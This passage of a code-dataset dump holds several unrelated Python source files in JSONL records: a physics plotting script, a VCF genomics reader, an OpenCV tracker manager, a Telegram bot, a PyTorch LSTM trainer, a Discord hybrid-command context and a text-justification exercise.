i in range(nProcesses):\n \tentry=leg.AddEntry(h[ sampleName[i] ],sampleName[i],\"lf\")\n leg.Draw()\n \n # Etiquetas explicando las condiciones del proceso\n text = \"#sqrt{{s}} = 240 GeV, L = {:.0f} ab^{{-1}}\".format(luminosity/1e6)\n channel = 'e^{+}e^{-} #rightarrow ZH #rightarrow #mu^{+}#mu^{-} + X'\n \n Text = ROOT.TLatex()\n Text.SetNDC()\n Text.SetTextAlign(31);\n Text.SetTextSize(0.04)\n Text.DrawLatex(0.47, 0.95, channel)\n \n Text.SetTextAlign(31);\n Text.SetTextSize(0.04)\n Text.DrawLatex(0.93, 0.95, text)\n \n # Guardamos la grafica \n c1.SaveAs(\"Plot_\"+histoName+\".png\")\n","repo_name":"mcepeda/ExamplesFCCee","sub_path":"Recoil/pintar.py","file_name":"pintar.py","file_ext":"py","file_size_in_byte":3804,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36235207912","text":"import gzip\nimport pandas as pd\nfrom collections import OrderedDict, Callable\n\nclass DefaultOrderedDict(OrderedDict):\n\t# Source: http://stackoverflow.com/a/6190500/562769\n\tdef __init__(self, default_factory=None, *a, **kw):\n\t\tif (default_factory is not None and\n\t\t not isinstance(default_factory, Callable)):\n\t\t\traise TypeError('first argument must be callable')\n\t\tOrderedDict.__init__(self, *a, **kw)\n\t\tself.default_factory = 
default_factory\n\n\tdef __getitem__(self, key):\n\t\ttry:\n\t\t\treturn OrderedDict.__getitem__(self, key)\n\t\texcept KeyError:\n\t\t\treturn self.__missing__(key)\n\n\tdef __missing__(self, key):\n\t\tif self.default_factory is None:\n\t\t\traise KeyError(key)\n\t\tself[key] = value = self.default_factory()\n\t\treturn value\n\n\tdef __reduce__(self):\n\t\tif self.default_factory is None:\n\t\t\targs = tuple()\n\t\telse:\n\t\t\targs = self.default_factory,\n\t\treturn type(self), args, None, None, self.items()\n\n\tdef copy(self):\n\t\treturn self.__copy__()\n\n\tdef __copy__(self):\n\t\treturn type(self)(self.default_factory, self)\n\n\tdef __deepcopy__(self, memo):\n\t\timport copy\n\t\treturn type(self)(self.default_factory,\n\t\t\t\t\t\t copy.deepcopy(self.items()))\n\n\tdef __repr__(self):\n\t\treturn 'OrderedDefaultDict(%s, %s)' % (self.default_factory,\n\t\t\t\t\t\t\t\t\t\t\t OrderedDict.__repr__(self))\n\nclass VCF():\n\tdef __init__(self, vcf_fn, pheno_fn=None, verbose=False):\n\t\tself.vcf_fn = vcf_fn\n\t\tself.colnames = self.read_vcf_header(vcf_fn, verbose=verbose)\n\t\trowdata, data = self.read_vcf(vcf_fn, self.colnames, verbose=verbose)\n\t\tself.rowdata = rowdata\n\t\tself.data = data\n\t\tif pheno_fn != None:\n\t\t\tcoldata = self.read_phenotype(pheno_fn, self.data.columns, verbose=verbose)\n\t\t\tself.coldata = coldata\n\n\n\tdef read_vcf_header(self, vcf_fn, verbose=False):\n\t\tif verbose: \n\t\t\tprint(\"Reading VCF header.\")\n\n\t\tif \".gz\" in vcf_fn:\n\t\t\twith gzip.open(vcf_fn, \"r\") as f:\n\t\t\t\tfor line in f:\n\t\t\t\t\tline = line.decode(\"utf-8\").strip()\n\t\t\t\t\tif line.startswith(\"#CHROM\"):\n\t\t\t\t\t\tsplit_line = line.split(\"\\t\")\n\t\t\t\t\t\tsplit_line[0] = \"CHROM\"\n\t\telse:\n\t\t\twith open(vcf_fn, \"r\") as f:\n\t\t\t\tfor line in f:\n\t\t\t\t\tline = line.strip()\n\t\t\t\t\tif line.startswith(\"#CHROM\"):\n\t\t\t\t\t\tsplit_line = line.split(\"\\t\")\n\t\t\t\t\t\tsplit_line[0] = \"CHROM\"\n\t\treturn split_line\n\n\n\t# def read_vcf(self, vcf_fn, colnames, verbose=False):\n\t# \tif verbose:\n\t# \t\tprint(\"Reading VCF content.\")\n\t# \tvcf = pd.read_table(vcf_fn, comment=\"#\", header=None, names=colnames)\n\t# \trowdata = vcf[['CHROM', 'POS', 'ID', 'REF', 'ALT', 'QUAL', 'FILTER', 'INFO', 'FORMAT']]\n\t# \tdata = vcf.iloc[:,9:]\n\t# \treturn rowdata, data\n\n\tdef read_vcf(self, vcf_fn, colnames, verbose=False):\n\t\tif verbose:\n\t\t\tprint(\"Reading VCF content line-by-line.\")\n\n\t\tcontainer = DefaultOrderedDict(list)\n\t\tif \".gz\" in vcf_fn:\n\t\t\twith gzip.open(vcf_fn, \"r\") as f:\n\t\t\t\tfor line in f:\n\t\t\t\t\tline = line.decode(\"utf-8\").strip()\n\t\t\t\t\tif line.startswith(\"#\"): # Skip comment lines.\n\t\t\t\t\t\tcontinue\n\t\t\t\t\telse:\n\t\t\t\t\t\tsplit_line = line.split(\"\\t\")\n\t\t\t\t\t\tassert len(colnames) == len(split_line)\n\t\t\t\t\t\tfor field, entry in zip(colnames, split_line):\n\t\t\t\t\t\t\tif field in ['CHROM', 'ID', 'REF', 'ALT', 'QUAL', 'FILTER', 'INFO', 'FORMAT']:\n\t\t\t\t\t\t\t\tcontainer[field].append(entry)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tcontainer[field].append(int(entry))\n\t\telse:\n\t\t\twith open(vcf_fn, \"r\") as f:\n\t\t\t\tfor line in f:\n\t\t\t\t\tline = line.strip()\n\t\t\t\t\tif line.startswith(\"#\"): # Skip comment lines.\n\t\t\t\t\t\tcontinue\n\t\t\t\t\telse:\n\t\t\t\t\t\tsplit_line = line.split(\"\\t\")\n\t\t\t\t\t\tassert len(colnames) == len(split_line)\n\t\t\t\t\t\tfor field, entry in zip(colnames, 
split_line):\n\t\t\t\t\t\t\tcontainer[field].append(entry)\n\t\tvcf = pd.DataFrame(container)\n\t\trowdata = vcf[['CHROM', 'POS', 'ID', 'REF', 'ALT', 'QUAL', 'FILTER', 'INFO', 'FORMAT']]\n\t\tdata = vcf.iloc[:,9:]\n\t\treturn rowdata, data\n\n\n\n\tdef read_phenotype(self, pheno_fn, sample, verbose=False):\n\t\tif verbose:\n\t\t\tprint(\"Reading Phenotype file.\")\n\t\tpheno = pd.read_table(pheno_fn)\n\t\tpheno = pheno[pheno[\"Accession_ID\"].isin(sample)]\n\t\tpheno.set_index(\"Accession_ID\", inplace=True)\n\t\tpheno = pheno.loc[~pheno.index.duplicated(keep='first')]\n\t\tpheno = pheno.reindex(sample)\n\t\tpheno.reset_index(inplace=True)\n\t\tpheno.rename(columns={\"index\":\"Accession_ID\"}, inplace=True)\n\t\treturn pheno\n\n\n\tdef remove_singletons(self):\n\t\tn_alt = self.data.apply(sum, axis=1)\n\t\tself.data = self.data[n_alt>1]\n\t\tself.rowdata = self.rowdata[n_alt>1]\n\n\n\tdef __repr__(self):\n\t\treturn f\"VCF: {self.vcf_fn}\\nNumber of samples: {self.data.shape[1]}\\nNumber of sites: {self.data.shape[0]}\"\n\n\n\tdef __eq__(self, other):\n\t\tif not isinstance(other, VCF):\n\t\t\treturn False\n\t\treturn self.data.equals(other.data) and self.rowdata.equals(other.rowdata)\n\n\n\n\n\n\n\n\n\n\n","repo_name":"boxiangliu/covseq","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4580,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"71371932008","text":"from Bio import SeqIO\n\nwith open('species.txt') as f:\n\tfor line in f.readlines():\n\t\tsn = line.strip()\n\t\ts = ''\n\t\tres = open('%s.fa' % sn, 'w')\n\t\twith open('filtered.muscle.list') as f1:\n\t\t\tfor line1 in f1.readlines():\n\t\t\t\ti = line1.strip()\n\t\t\t\tfor info in SeqIO.parse(i, 'fasta'):\n\t\t\t\t\tif sn in info.id:\n\t\t\t\t\t\ts += str(info.seq)\n\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\tcontinue\n\t\tres.write('>%s\\n' % sn)\n\t\tres.write('%s\\n' % s)\n\t\tres.close()\n\n","repo_name":"YuboWang1994/Oat-genome-origin-and-evolution","sub_path":"subgenome_evolution/combine_gblock.py","file_name":"combine_gblock.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"74841651047","text":"import logging\nimport Constants\nfrom TrackerOpenCV import TrackerOpenCV\nfrom cv2 import cv2\n\nclass TrackerManager:\n def __init__(self, input_json, tracker_type=Constants.OPENCV_TYPE, threshold_objects=10):\n self.tracker_type = tracker_type.lower()\n if tracker_type == Constants.OPENCV_TYPE:\n self.trackers = cv2.MultiTracker_create()\n else:\n logging.error(\"Pls, implement MultiTracker for\", tracker_type)\n raise Exception(\"Pls, implement MultiTracker for\", tracker_type)\n return\n self.threshold_objects = threshold_objects\n self.input_json = input_json\n\n def update_all(self, frame):\n # grab the updated bounding box coordinates (if any) for each\n # object that is being tracked\n (success, boxes) = self.trackers.update(frame)\n # loop over the bounding boxes and draw then on the frame\n for box in boxes:\n (x, y, w, h) = [int(v) for v in box]\n # Draw rectangles\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n return frame\n\n def init_trackers(self, tracker_name, frame):\n # read json and initiate objects\n cnt = 0\n for element in self.input_json:\n box = (element['coordinates'][0], element['coordinates'][1],\n element['coordinates'][2], element['coordinates'][3])\n try:\n if cnt + 1 <= 
self.threshold_objects:\n if self.tracker_type == Constants.OPENCV_TYPE:\n # check the most common trackers (kcf, csrt or tld)\n if tracker_name == Constants.KCF or tracker_name == Constants.CSRT or \\\n tracker_name == Constants.TLD:\n tracker = TrackerOpenCV(tracker_name)\n logging.info(tracker_name + \" tracker inited!\")\n else:\n logging.error(\"Pls, implement Tracker for\", self.tracker_type)\n raise Exception(\"Pls, implement Tracker for\", self.tracker_type)\n return\n self.trackers.add(tracker.tracker, frame, box)\n cnt += 1 # increase the number of tracked objects\n except:\n logging.error(\"Error while initializing the tracker\", self.tracker_type)\n raise Exception(\"Error while initializing the tracker\", self.tracker_type)\n return\n","repo_name":"lddtandil/multitracker_object_dockerized","sub_path":"src/TrackerManager.py","file_name":"TrackerManager.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73576081769","text":"\nfrom pprint import pprint\n\nfrom aiogram import types\n\nfrom app_telegram.keyboards import kb_auth, kb_auth_url, kb_trek\nfrom repositories.url_requests import AuthRepositories\nfrom repositories.sql_requests import SQLRepositories\n\n\nasync def start_bot(message: types.Message):\n await SQLRepositories.add_user(message.chat.id)\n await message.answer(\"Добро пожаловать\", reply_markup=kb_auth)\n\n\nasync def auth(message: types.Message):\n await message.answer(\"Авторизуйтесь на сайте\\n\"\n \"После чего вернитесь в бот\", reply_markup=kb_auth_url)\n await message.answer(\"Для получения текущей песни нажмите ниже\", reply_markup=kb_trek)\n\n\nasync def get_trek(message: types.Message):\n username = await SQLRepositories.get_username(message.chat.id)\n trek_data = AuthRepositories.request_trek(username)\n pprint(trek_data)\n await message.answer(f\"Артист: {trek_data['artist']['#text']}\\nИмя трека: {trek_data['name']}\\n{trek_data['url']}\")\n","repo_name":"Andrei00001/last.fm","sub_path":"app_telegram/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69896015209","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\n\nimport src.constants as constants\nfrom src.networks.lstm_embedding_network import LstmEmbeddingNetwork\nfrom src.results_aggregator import ResultsAggregator\n\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\nclass NetworkTrainer:\n def __init__(self,\n network: LstmEmbeddingNetwork,\n train_data_loader: DataLoader,\n test_data_loader: DataLoader,\n valid_data_loader: DataLoader,\n total_epochs: int,\n is_dynamic_lr_scheduler: bool):\n\n self.network = network\n\n self.train_data_loader = train_data_loader\n self.test_data_loader = test_data_loader\n self.valid_data_loader = valid_data_loader\n\n self.loss_function = nn.CrossEntropyLoss()\n self.optimizer = optim.SGD(network.parameters(), lr=0.01, momentum=0.9)\n\n self.is_dynamic_lr_scheduler = is_dynamic_lr_scheduler\n \n if is_dynamic_lr_scheduler:\n self.lr_scheduler = optim.lr_scheduler.ReduceLROnPlateau(self.optimizer, patience=2, verbose=True)\n else:\n lr_lambda = lambda epoch: (total_epochs - epoch) / total_epochs\n self.lr_scheduler = optim.lr_scheduler.LambdaLR(self.optimizer, lr_lambda=lr_lambda, verbose=True)\n\n\n def 
get_loss(self, model_output, y_target):\n return self.loss_function(model_output, y_target)\n\n def get_accuracy(self, model_output, y_target):\n output_class_pred = model_output.argmax(dim=1)\n equal_samples = torch.eq(output_class_pred, y_target)\n\n return equal_samples.sum() / constants.BATCH_SIZE\n\n\n def epoch_train(self, epoch):\n self.network.train()\n\n results_aggregator = ResultsAggregator()\n\n (h, c) = self.network.get_initial_hidden_context()\n cur_song_index = 0\n\n for batch_idx, (song_index, x, y) in enumerate(self.train_data_loader):\n if len(x) < constants.BATCH_SIZE:\n continue # Do not support smaller tensors that are not of batch size as first dimension\n\n if cur_song_index != song_index.item():\n (h, c) = self.network.get_initial_hidden_context()\n cur_song_index = song_index.item()\n\n self.optimizer.zero_grad()\n\n x = x.to(device)\n y = y.to(device)\n\n output, (h, c) = self.network(x, (h, c))\n\n loss = self.get_loss(output, y)\n results_aggregator.aggregate_loss(loss.item())\n\n h = h.detach()\n c = c.detach()\n\n loss.backward()\n self.optimizer.step()\n\n accuracy = self.get_accuracy(output, y)\n results_aggregator.aggregate_accuracy(accuracy.item())\n\n if batch_idx % constants.BATCH_LOG_INTERVAL == 0 and batch_idx != 0:\n current_item = batch_idx * len(x)\n\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\t\\tAverage Loss: {:.6f}\\tAverage Right Predictions: {:.4f}'.format(\n f\"{epoch:03d}\",\n f\"{current_item:04d}\",\n len(self.train_data_loader.dataset),\n 100. * batch_idx / len(self.train_data_loader),\n results_aggregator.get_average_loss(batch_idx), \n results_aggregator.get_average_accuracy(batch_idx)\n ))\n\n batch_idx = int(len(self.train_data_loader.dataset) / constants.BATCH_SIZE)\n results_aggregator.update_plots('train', batch_idx, epoch)\n \n\n def epoch_valid(self, epoch):\n self.network.eval()\n\n results_aggregator = ResultsAggregator()\n\n (h, c) = self.network.get_initial_hidden_context()\n cur_song_index = 0\n\n for batch_idx, (song_index, x, y) in enumerate(self.valid_data_loader):\n if len(x) < constants.BATCH_SIZE:\n continue # Do not support smaller tensors that are not of batch size as first dimension\n\n if cur_song_index != song_index.item():\n (h, c) = self.network.get_initial_hidden_context()\n cur_song_index = song_index.item()\n\n self.optimizer.zero_grad()\n\n x = x.to(device)\n y = y.to(device)\n\n output, (h, c) = self.network(x, (h, c))\n\n loss = self.get_loss(output, y)\n results_aggregator.aggregate_loss(loss.item())\n\n accuracy = self.get_accuracy(output, y)\n results_aggregator.aggregate_accuracy(accuracy.item())\n\n if batch_idx % constants.VALID_PREDICTION_SAMPLE_RATE == 0 and batch_idx != 0:\n current_item = batch_idx * len(x)\n\n print('Valid Epoch: {} [{}/{} ({:.0f}%)]\\tAverage Loss: {:.6f}\\tAverage Right Predictions: {:.4f}'.format(\n f\"{epoch:03d}\",\n f\"{current_item:04d}\",\n len(self.valid_data_loader.dataset),\n 100. 
* batch_idx / len(self.valid_data_loader),\n results_aggregator.get_average_loss(batch_idx), \n results_aggregator.get_average_accuracy(batch_idx)\n ))\n \n average_loss = results_aggregator.get_average_loss(len(self.valid_data_loader.dataset))\n \n if constants.APPLY_LR_SCHEDULER:\n self.lr_scheduler.step(average_loss)\n learning_rate = self.lr_scheduler.optimizer.param_groups[0]['lr']\n\n # if self.is_dynamic_lr_scheduler:\n # print(f'learning_rate: {learning_rate}')\n\n batch_idx = int(len(self.valid_data_loader.dataset) / constants.BATCH_SIZE)\n results_aggregator.update_plots('valid', batch_idx, epoch)\n\n\n def test(self):\n self.network.eval()\n\n results_aggregator = ResultsAggregator()\n\n (h, c) = self.network.get_initial_hidden_context()\n cur_song_index = 0\n\n for _, (song_index, x, y) in enumerate(self.test_data_loader):\n if len(x) < constants.BATCH_SIZE:\n continue # Do not support smaller tensors that are not of batch size as first dimension\n\n if cur_song_index != song_index.item():\n (h, c) = self.network.get_initial_hidden_context()\n cur_song_index = song_index.item()\n\n self.optimizer.zero_grad()\n\n x = x.to(device)\n y = y.to(device)\n\n output, (h, c) = self.network(x, (h, c))\n\n loss = self.get_loss(output, y)\n results_aggregator.aggregate_loss(loss.item())\n\n accuracy = self.get_accuracy(output, y)\n results_aggregator.aggregate_accuracy(accuracy.item())\n\n current_item = int(len(self.test_data_loader.dataset) / constants.BATCH_SIZE)\n\n print('Test [{}/{}]\\tAverage Loss: {:.6f}\\tAverage Right Predictions: {:.4f}'.format(\n len(self.test_data_loader.dataset),\n len(self.test_data_loader.dataset),\n results_aggregator.get_average_loss(current_item), \n results_aggregator.get_average_accuracy(current_item)\n ))\n \n return results_aggregator.get_average_accuracy(current_item)","repo_name":"arsenaultk9/chord2vec","sub_path":"src/network_trainer.py","file_name":"network_trainer.py","file_ext":"py","file_size_in_byte":7261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14425798778","text":"import datetime\n\nfrom typing import TYPE_CHECKING, Any, Optional, Union, Iterable, Sequence\nfrom typing_extensions import Self\n\n\nfrom interactions import (\n BaseContext,\n Permissions,\n Message,\n SlashContext,\n Client,\n Typing,\n Embed,\n BaseComponent,\n UPLOADABLE_TYPE,\n Snowflake_Type,\n Sticker,\n AllowedMentions,\n MessageReference,\n MessageFlags,\n to_snowflake,\n Attachment,\n process_message_payload,\n)\nfrom interactions.client.mixins.send import SendMixin\nfrom interactions.ext import prefixed_commands as prefixed\n\nif TYPE_CHECKING:\n from .hybrid_slash import HybridSlashCommand\n\n__all__ = (\"HybridContext\",)\n\n\nclass DeferTyping:\n def __init__(self, ctx: \"HybridContext\", ephermal: bool) -> None:\n self.ctx = ctx\n self.ephermal = ephermal\n\n async def __aenter__(self) -> None:\n await self.ctx.defer(ephemeral=self.ephermal)\n\n async def __aexit__(self, *_) -> None:\n pass\n\n\nclass HybridContext(BaseContext, SendMixin):\n prefix: str\n \"The prefix used to invoke this command.\"\n\n app_permissions: Permissions\n \"\"\"The permissions available to this context\"\"\"\n\n deferred: bool\n \"\"\"Whether the context has been deferred.\"\"\"\n responded: bool\n \"\"\"Whether the context has been responded to.\"\"\"\n ephemeral: bool\n \"\"\"Whether the context response is ephemeral.\"\"\"\n\n _command_name: str\n \"\"\"The command name.\"\"\"\n _message: Message | None\n\n args: 
list[Any]\n \"\"\"The arguments passed to the command.\"\"\"\n kwargs: dict[str, Any]\n \"\"\"The keyword arguments passed to the command.\"\"\"\n\n __attachment_index__: int\n\n _slash_ctx: SlashContext | None\n _prefixed_ctx: prefixed.PrefixedContext | None\n\n def __init__(self, client: Client):\n super().__init__(client)\n self.prefix = \"\"\n self.app_permissions = Permissions(0)\n self.deferred = False\n self.responded = False\n self.ephemeral = False\n self._command_name = \"\"\n self.args = []\n self.kwargs = {}\n self._message = None\n self.__attachment_index__ = 0\n self._slash_ctx = None\n self._prefixed_ctx = None\n\n @classmethod\n def from_dict(cls, client: Client, payload: dict) -> None:\n # this doesn't mean anything, so just implement it to make abc happy\n raise NotImplementedError\n\n @classmethod\n def from_slash_context(cls, ctx: SlashContext) -> Self:\n self = cls(ctx.client)\n self.guild_id = ctx.guild_id\n self.channel_id = ctx.channel_id\n self.author_id = ctx.author_id\n self.message_id = ctx.message_id\n self.prefix = \"/\"\n self.app_permissions = ctx.app_permissions\n self.deferred = ctx.deferred\n self.responded = ctx.responded\n self.ephemeral = ctx.ephemeral\n self._command_name = ctx._command_name\n self.args = ctx.args\n self.kwargs = ctx.kwargs\n self._slash_ctx = ctx\n return self\n\n @classmethod\n def from_prefixed_context(cls, ctx: prefixed.PrefixedContext) -> Self:\n # this is a \"best guess\" on what the permissions are\n # this may or may not be totally accurate\n if hasattr(ctx.channel, \"permissions_for\"):\n app_permissions = ctx.channel.permissions_for(ctx.guild.me) # type: ignore\n elif ctx.channel.type in {10, 11, 12}: # it's a thread\n app_permissions = ctx.channel.parent_channel.permissions_for(ctx.guild.me) # type: ignore\n else:\n app_permissions = Permissions(0)\n\n self = cls(ctx.client)\n self.guild_id = ctx.guild_id\n self.channel_id = ctx.channel_id\n self.author_id = ctx.author_id\n self.message_id = ctx.message_id\n self._message = ctx.message\n self.prefix = ctx.prefix\n self.app_permissions = app_permissions\n self._command_name = ctx.command.qualified_name\n self.args = ctx.args\n self._prefixed_ctx = ctx\n return self\n\n @property\n def inner_context(self) -> SlashContext | prefixed.PrefixedContext:\n \"\"\"The inner context that this hybrid context is wrapping.\"\"\"\n return self._slash_ctx or self._prefixed_ctx # type: ignore\n\n @property\n def command(self) -> \"HybridSlashCommand\":\n return self.client._interaction_lookup[self._command_name]\n\n @property\n def expires_at(self) -> Optional[datetime.datetime]:\n \"\"\"The time at which the interaction expires.\"\"\"\n if not self._slash_ctx:\n return None\n\n if self.responded:\n return self._slash_ctx.id.created_at + datetime.timedelta(minutes=15)\n return self._slash_ctx.id.created_at + datetime.timedelta(seconds=3)\n\n @property\n def expired(self) -> bool:\n \"\"\"Whether the interaction has expired.\"\"\"\n return datetime.datetime.utcnow() > self.expires_at if self._slash_ctx else False\n\n @property\n def deferred_ephemeral(self) -> bool:\n \"\"\"Whether the interaction has been deferred ephemerally.\"\"\"\n return self.deferred and self.ephemeral\n\n @property\n def message(self) -> Message | None:\n \"\"\"The message that invoked this context.\"\"\"\n return self._message or self.client.cache.get_message(self.channel_id, self.message_id)\n\n @property\n def typing(self) -> Typing | DeferTyping:\n \"\"\"A context manager to send a _typing/defer state to a given 
channel as long as long as the wrapped operation takes.\"\"\"\n if self._slash_ctx:\n return DeferTyping(self._slash_ctx, self.ephemeral)\n return self.channel.typing\n\n async def defer(self, ephemeral: bool = False) -> None:\n \"\"\"\n Either defers the response (if used in an interaction) or triggers a typing indicator for 10 seconds (if used for messages).\n\n Args:\n ephemeral: Should the response be ephemeral? Only applies to responses for interactions.\n\n \"\"\"\n if self._slash_ctx:\n await self._slash_ctx.defer(ephemeral=ephemeral)\n else:\n await self.channel.trigger_typing()\n\n self.deferred = True\n\n async def reply(\n self,\n content: Optional[str] = None,\n embeds: Optional[\n Union[\n Iterable[Union[Embed, dict]],\n Union[Embed, dict],\n ]\n ] = None,\n embed: Optional[Union[Embed, dict]] = None,\n **kwargs,\n ) -> \"Message\":\n \"\"\"\n Reply to this message, takes all the same attributes as `send`.\n\n For interactions, this functions the same as `send`.\n \"\"\"\n kwargs = locals()\n kwargs.pop(\"self\")\n extra_kwargs = kwargs.pop(\"kwargs\")\n kwargs |= extra_kwargs\n\n if self._slash_ctx:\n result = await self.send(**kwargs)\n else:\n kwargs.pop(\"ephemeral\", None)\n result = await self._prefixed_ctx.reply(**kwargs)\n\n self.responded = True\n return result\n\n async def _send_http_request(\n self,\n message_payload: dict,\n files: Iterable[\"UPLOADABLE_TYPE\"] | None = None,\n ) -> dict:\n if self._slash_ctx:\n return await self._slash_ctx._send_http_request(message_payload, files)\n return await self._prefixed_ctx._send_http_request(message_payload, files)\n\n async def send(\n self,\n content: Optional[str] = None,\n *,\n embeds: Optional[\n Union[\n Iterable[Union[\"Embed\", dict]],\n Union[\"Embed\", dict],\n ]\n ] = None,\n embed: Optional[Union[\"Embed\", dict]] = None,\n components: Optional[\n Union[\n Iterable[Iterable[Union[\"BaseComponent\", dict]]],\n Iterable[Union[\"BaseComponent\", dict]],\n \"BaseComponent\",\n dict,\n ]\n ] = None,\n stickers: Optional[\n Union[\n Iterable[Union[\"Sticker\", \"Snowflake_Type\"]],\n \"Sticker\",\n \"Snowflake_Type\",\n ]\n ] = None,\n allowed_mentions: Optional[Union[\"AllowedMentions\", dict]] = None,\n reply_to: Optional[Union[\"MessageReference\", \"Message\", dict, \"Snowflake_Type\"]] = None,\n files: Optional[Union[\"UPLOADABLE_TYPE\", Iterable[\"UPLOADABLE_TYPE\"]]] = None,\n file: Optional[\"UPLOADABLE_TYPE\"] = None,\n tts: bool = False,\n suppress_embeds: bool = False,\n silent: bool = False,\n flags: Optional[Union[int, \"MessageFlags\"]] = None,\n delete_after: Optional[float] = None,\n ephemeral: bool = False,\n **kwargs: Any,\n ) -> \"Message\":\n \"\"\"\n Send a message.\n\n Args:\n content: Message text content.\n embeds: Embedded rich content (up to 6000 characters).\n embed: Embedded rich content (up to 6000 characters).\n components: The components to include with the message.\n stickers: IDs of up to 3 stickers in the server to send in the message.\n allowed_mentions: Allowed mentions for the message.\n reply_to: Message to reference, must be from the same channel.\n files: Files to send, the path, bytes or File() instance, defaults to None. You may have up to 10 files.\n file: Files to send, the path, bytes or File() instance, defaults to None. 
You may have up to 10 files.\n tts: Should this message use Text To Speech.\n suppress_embeds: Should embeds be suppressed on this send\n silent: Should this message be sent without triggering a notification.\n flags: Message flags to apply.\n delete_after: Delete message after this many seconds.\n ephemeral: Should this message be sent as ephemeral (hidden) - only works with interactions\n\n Returns:\n New message object that was sent.\n \"\"\"\n flags = MessageFlags(flags or 0)\n if ephemeral and self._slash_ctx:\n flags |= MessageFlags.EPHEMERAL\n self.ephemeral = True\n if suppress_embeds:\n flags |= MessageFlags.SUPPRESS_EMBEDS\n if silent:\n flags |= MessageFlags.SILENT\n\n return await super().send(\n content=content,\n embeds=embeds,\n embed=embed,\n components=components,\n stickers=stickers,\n allowed_mentions=allowed_mentions,\n reply_to=reply_to,\n files=files,\n file=file,\n tts=tts,\n flags=flags,\n delete_after=delete_after,\n pass_self_into_delete=bool(self._slash_ctx),\n **kwargs,\n )\n\n async def delete(self, message: \"Snowflake_Type\") -> None:\n \"\"\"\n Delete a message sent in response to this context. Must be in the same channel as the context.\n\n Args:\n message: The message to delete\n \"\"\"\n if self._slash_ctx:\n return await self._slash_ctx.delete(message)\n await self.client.http.delete_message(self.channel_id, to_snowflake(message))\n\n async def edit(\n self,\n message: \"Snowflake_Type\",\n *,\n content: Optional[str] = None,\n embeds: Optional[\n Union[\n Iterable[Union[\"Embed\", dict]],\n Union[\"Embed\", dict],\n ]\n ] = None,\n embed: Optional[Union[\"Embed\", dict]] = None,\n components: Optional[\n Union[\n Iterable[Iterable[Union[\"BaseComponent\", dict]]],\n Iterable[Union[\"BaseComponent\", dict]],\n \"BaseComponent\",\n dict,\n ]\n ] = None,\n attachments: Optional[Sequence[Attachment | dict]] = None,\n allowed_mentions: Optional[Union[\"AllowedMentions\", dict]] = None,\n files: Optional[Union[\"UPLOADABLE_TYPE\", Iterable[\"UPLOADABLE_TYPE\"]]] = None,\n file: Optional[\"UPLOADABLE_TYPE\"] = None,\n tts: bool = False,\n ) -> \"Message\":\n if self._slash_ctx:\n return await self._slash_ctx.edit(\n message,\n content=content,\n embeds=embeds,\n embed=embed,\n components=components,\n attachments=attachments,\n allowed_mentions=allowed_mentions,\n files=files,\n file=file,\n tts=tts,\n )\n\n message_payload = process_message_payload(\n content=content,\n embeds=embeds or embed,\n components=components,\n allowed_mentions=allowed_mentions,\n attachments=attachments,\n tts=tts,\n )\n if file:\n files = [file, *files] if files else [file]\n\n message_data = await self.client.http.edit_message(\n message_payload, self.channel_id, to_snowflake(message), files=files\n )\n if message_data:\n return self.client.cache.place_message_data(message_data)\n","repo_name":"interactions-py/interactions.py","sub_path":"interactions/ext/hybrid_commands/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":13057,"program_lang":"python","lang":"en","doc_type":"code","stars":760,"dataset":"github-code","pt":"53"} +{"seq_id":"73657634408","text":"\"\"\"\nThis problem was asked by Palantir.\n\nWrite an algorithm to justify text. 
Given a sequence of words and an integer line length k,\nreturn a list of strings which represents each line, fully justified.\n\nMore specifically, you should have as many words as possible in each line.\nThere should be at least one space between each word.\n Pad extra spaces when necessary so that each line has exactly length k.\n Spaces should be distributed as equally as possible, with the extra spaces, if any, distributed starting from the left.\n\nIf you can only fit one word on a line, then you should pad the right-hand side with spaces.\n\nEach word is guaranteed not to be longer than k.\n\nFor example, given the list of words [\"the\", \"quick\", \"brown\", \"fox\", \"jumps\", \"over\", \"the\", \"lazy\", \"dog\"] and k = 16,\n you should return the following:\n\n[\"the quick brown\", # 1 extra space on the left\n\"fox jumps over\", # 2 extra spaces distributed evenly\n\"the lazy dog\"] # 4 extra spaces distributed evenly\n\"\"\"\n\n\ndef fullJustify(words, maxWidth):\n j = 0\n ans = []\n n = len(words)\n while j < n:\n curr_str = \"\"\n i = j\n curr_sum = 0\n space = 0\n while j < n and curr_sum + len(words[j]) + space <= maxWidth:\n curr_sum += len(words[j])\n j += 1\n space += 1\n total_spaces = maxWidth - curr_sum\n if j >= n:\n flag = \"first\"\n for x in range(i, j):\n if flag == \"first\":\n curr_str = curr_str + words[x]\n flag = \"last\"\n else:\n curr_str = curr_str + \" \" +words[x]\n else:\n\n mandatory_spaces = total_spaces // (j - i - 1 or 1)\n extra_spaces = total_spaces % (j - i - 1 or 1)\n for x in range(i, j):\n curr_str = curr_str + words[x]\n s = 0\n while s < mandatory_spaces and x < j - 1:\n curr_str = curr_str + \" \"\n s += 1\n if extra_spaces > 0:\n extra_spaces -= 1\n curr_str = curr_str + \" \"\n while len(curr_str) < maxWidth:\n curr_str = curr_str + \" \"\n ans.append(curr_str)\n return ans\n\n\nwords = [\"What\",\"must\",\"be\",\"acknowledgment\",\"shall\",\"be\"]\nmaxWidth = 16\nans = fullJustify(words, 